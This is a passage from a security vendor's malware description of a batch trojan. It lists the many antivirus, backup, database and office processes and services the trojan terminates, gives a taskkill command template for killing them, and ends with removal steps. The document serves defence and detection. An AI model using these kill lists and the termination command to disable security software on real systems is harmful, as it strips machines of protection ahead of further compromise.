- scanmailoutlook.exe
- scanmsg.exe
- scanwscs.exe
- scfmanager.exe
- scfservice.exe
- scftray.exe
- schdsrvc.exe
- schupd.exe
- sdrservice.exe
- sdtrayapp.exe
- seccenter.exe
- securitycenter.exe
- semsvc.exe
- sesclu.exe
- setloadorder.exe
- setupguimngr.exe
- sevinst.exe
- sgbhp.exe
- shstat.exe
- sidebar.exe
- siteadv.exe
- smc.exe
- smcgui.exe
- smex_activeupda
- smex_master.exe
- smex_remoteconf
- smex_systemwatc
- smoutlookpack.exe
- sms.exe
- smsectrl.exe
- smselog.exe
- smsesjm.exe
- smsesp.exe
- smsesrv.exe
- smsetask.exe
- smseui.exe
- smsx.exe
- snac.exe
- sndmon.exe
- sndsrvc.exe
- snhwsrv.exe
- spbbcsvc.exe
- spideragent.exe
- spiderml.exe
- spidernt.exe
- spiderui.exe
- spntsvc.exe
- srvload.exe
- srvmon.exe
- sschk.exe
- ssm.exe
- ssp.exe
- ssscheduler.exe
- starta.exe
- stinger.exe
- stopa.exe
- stopp.exe
- stwatchdog.exe
- svcgenerichost
- svcharge.exe
- svcntaux.exe
- svdealer.exe
- svframe.exe
- svtray.exe
- swc_service.exe
- swdsvc.exe
- sweepsrv.sys
- swi_service.exe
- swnetsup.exe
- symlcsvc.exe
- symproxysvc.exe
- symsport.exe
- symtray.exe
- symwsc.exe
- sysdoc32.exe
- sysoptenginesvc.exe
- tbmon.exe
- tclproc.exe
- tfgui.exe
- tfservice.exe
- tftray.exe
- tfun.exe
- tmas.exe
- tmlisten.exe
- tmntsrv.exe
- tmpfw.exe
- tmproxy.exe
- tnbutil.exe
- toolbarupdater.exe
- tpsrv.exe
- trjscan.exe
- trupd.exe
- tsansrf.exe
- tsatisy.exe
- tscutynt.exe
- tsmpnt.exe
- ucservice.exe
- udaterui.exe
- uiseagnt.exe
- uiwatchdog.exe
- umxagent.exe
- umxcfg.exe
- umxfwhlp.exe
- umxpol.exe
- unsecapp.exe
- unvet32.exe
- up2date.exe
- update_task.exe
- updaterui.exe
- updtnv28.exe
- upfile.exe
- upschd.exe
- urllstck.exe
- usrprmpt.exe
- v2iconsole.exe
- v3clnsrv.exe
- v3exec.exe
- v3imscn.exe
- v3lite.exe
- v3main.exe
- v3medic.exe
- v3sp.exe
- v3svc.exe
- vetmsg.exe
- vettray.exe
- vpc32.exe
- vpdn_lu.exe
- vprosvc.exe
- vprot.exe
- vptray.exe
- vrv.exe
- vrvmail.exe
- vrvmon.exe
- vrvnet.exe
- vshwin32.exe
- vsmain.exe
- vsmon.exe
- vsserv.exe
- vsstat.exe
- vstskmgr.exe
- webproxy.exe
- webscanx.exe
- websensecontrolservice.exe
- webtrapnt.exe
- wfxctl32.exe
- wfxmod32.exe
- wfxsnt40.exe
- winroute.exe
- wrctrl.exe
- wrsa.exe
- wrspysetup.exe
- wscntfy.exe
- wssfcmai.exe
- wtusystemsuport.exe
- xcommsvr.exe
- xfilter.exe
- zanda.exe
- zavcore.exe
- zillya.exe
- zlclient.exe
- zlh.exe
- taskkill /im {Process Name} /f -Terminate the following running processes:
- aclient.exe
- aclntusr.exe
- aesecurityservice.exe
- aexagentuihost.exe
- aexnsagent.exe
- aexnsrcvsvc.exe
- aexsvc.exe
- aexswdusr.exe
- agntsvc.exe
- amsvc.exe
- atrshost.exe
- avscc.exe
- basfipm.exe
- bcreporter.exe
- bcrservice.exe
- bluestripecollector.exe
- ccflic0.exe
- ccflic4.exe
- ccm messaging.exe
- cdm.exe
- certificateprovider.exe
- chrome.exe
- client.exe
- client64.exe
- collwrap.exe
- config_api_service.exe
- control_panel.exe
- csdbsync.exe
- cslog.exe
- csmon.exe
- csradius.exe
- csrss_tc.exe
- cstacacs.exe
- ctdataload.exe
- cwbunnav.exe
- dbeng50.exe
- dbsnmp.exe
- dltray.exe
- dolphincharge.e
- dolphincharge.exe
- dsmcad.exe
- dsmcsvc.exe
- dwrcst.exe
- encsvc.exe
- epmd.exe
- erlsrv.exe
- excel.exe
- execstat.exe
- firefox.exe
- firefoxconfig.exe
- fnplicensingservice.exe
- frzstate2k.exe
- googlecrashhandler.exe
- googlecrashhandler64.ex
- googleupdate.exe
- hasplmv.exe
- hdb.exe
- healthservice.exe
- hpqwmiex.exe
- ilicensesvc.exe
- inet_gethost.exe
- infopath.exe
- isqlplussvc.exe
- kb891711.exe
- keysvc.exe
- loggetor.exe
- managementagenthost.exe
- managementagentnt.exe /
- monitoringhost.exe
- msaccess.exe
- msdtssrvr.exe
- msftesql.exe
- msmdsrv.exe
- mspmspsv.exe
- mspub.exe
- musnotificationux.exe
- mydesktopqos.exe
- mydesktopservice.exe
- mysqld.exe
- mysqld-nt.exe
- mysqld-opt.exe - sql
- nd2svc.exe
- ndrvs.exe
- ndrvx.exe
- nerosvc.exe
- netalertclient.exe
- netsession_win.exe
- nexe
- nimbus.exe
- nimcluster.exe
- nlclient.exe
- nlsvc.exe
- nmagent.exe
- npmdagent.exe
- nslocollectorservice.exe
- ntcaagent.exe
- ntcadaemon.exe
- ntcaservice.exe
- ntevl.exe
- ntservices.exe
- ocautoupds.exe
- ocomm.exe
- ocssd.exe
- omniagent.exe
- omslogmanager.exe
- omtsreco.exe
- onenote.exe
- oracle.exe
- outlook.exe
- paamsrv.exe
- patch.exe
- patrolagent.exe
- patrolperf.exe
- paxton.net2.clientservice.exe
- paxton.net2.commsserverservice.exe
- pcscm.exe
- pcsws.exe
- pmgreader.exe
- pmon.exe
- powerpnt.exe
- ppmcativedetection.exe
- pralarmmgr.exe
- prcalculationmgr.exe
- prconfigmgr.exe
- prdatabasemgr.exe
- premailengine.exe
- preventmgr.exe
- prftpengine.exe
- prgateway.exe
- printdevice.exe
- prlicensemgr.exe
- procexp.exe
- proficy administrator.exe
- proficyclient.exe4
- proficypublisherservice.exe
- proficyserver.exe
- proficysts.exe
- prprintserver.exe
- prproficymgr.exe
- prrds.exe
- prreader.exe
- prrouter.exe
- prschedulemgr.exe
- prstubber.exe
- prsummarymgr.exe
- prunsrv.exe
- prwriter.exe
- pthosttr.exe
- pview.exe
- pviewer.exe
- pwdfilthelp.exe
- rapuisvc.exe
- rdrcef.exe
- realmon.exe
- repmgr64.exe
- reportingservicesservicesservice.exe
- rscd.exe
- rscdsvc.exe
- rssensor.exe
- sbamsvc.exe
- scfagent_64.exe
- seanalyzertool.exe
- securitymanager.exe
- seestat.exe
- server_eventlog.exe
- server_runtime.exe
- slee81.exe
- snicheckadm.exe
- snichecksrv.exe
- snicon.exe
- snsrv.exe
- spooler.exe
- spyemergency.exe
- spyemergencysrv.exe
- sqbcoreservice.exe
- sqlagent.exe
- sqlbrowser.exe
- sqlservr.exe
- sqlwriter.exe
- ssecuritymanager.exe
- steam.exe
- swnxt.exe
- swserver.exe
- synctime.exe
- taskhostw.exe
- tbirdconfig.exe
- tdimon.exe
- teamviewer_service.exe
- thebat.exe
- thebat64.exe
- thunderbird.exe
- tiaspn~1.exe
- tnslsnr.exe
- traflnsp.exe
- traptrackermgr.exe
- uplive.exe
- uploadrecord.exe
- url_response.exe
- useractivity.exe
- useranalysis.exe
- usergate.exe
- vgauthservice.exe
- visio.exe
- vmacthlp.exe
- vmtoolsd.exe
- vmware-converter.exe
- vmware-converter-a.exe
- vmwaretray.exe
- vpatch.exe
- win32sysinfo.exe
- winlog.exe
- winvnc4.exe
- winword.exe
- wordpad.exe
- workflowresttest.exe
- xfssvccon.exe
- zapro.exe
- zonealarm.exe
- zoolz.exe - storage
- %Temp%\sync.exe
Process Termination
This Trojan disables antivirus services by terminating the following services if found on the affected system:
- AcronisAgent
- aswBcc
- BackupExecRPCService
- ccEvtMgr
- ccSetMgr
- EhttpSrv
- ekrn
- EPIntegrationService
- EPProtectedService
- EPSecurityService
- EPUpdateService
- ESHASRV
- FA_Scheduler
- IDriverT
- klnagent
- macmnsvc
- masvc
- MBAMService
- McShield
- mfefire
- mfemms
- mfevtp
- mfewc
- myAgtSvc
- ntrtscan
- RumorServer
- SepMasterService
- SepMasterServiceMig
- Smcinst
- SNAC
- SntpService
- svcGenericHost
- swi_filter
- swi_service
- swi_update
- swi_update_64
- Symantec
- Symantec System Recovery
- TmCCSF
- tmlisten
- TmPfw
- WdNisSvc
- WinDefend
SOLUTION
Minimum Scan Engine: 9.800
FIRST VSAPI PATTERN FILE: 15.846.03
FIRST VSAPI PATTERN DATE: 04 May 2020
VSAPI OPR PATTERN File: 15.847.00
VSAPI OPR PATTERN Date: 05 May 2020
Step 1
Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Scan your computer with your Trend Micro product to delete files detected as Trojan.BAT.STARTER.TIAOOAAZ. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Did this description help? Tell us how we did.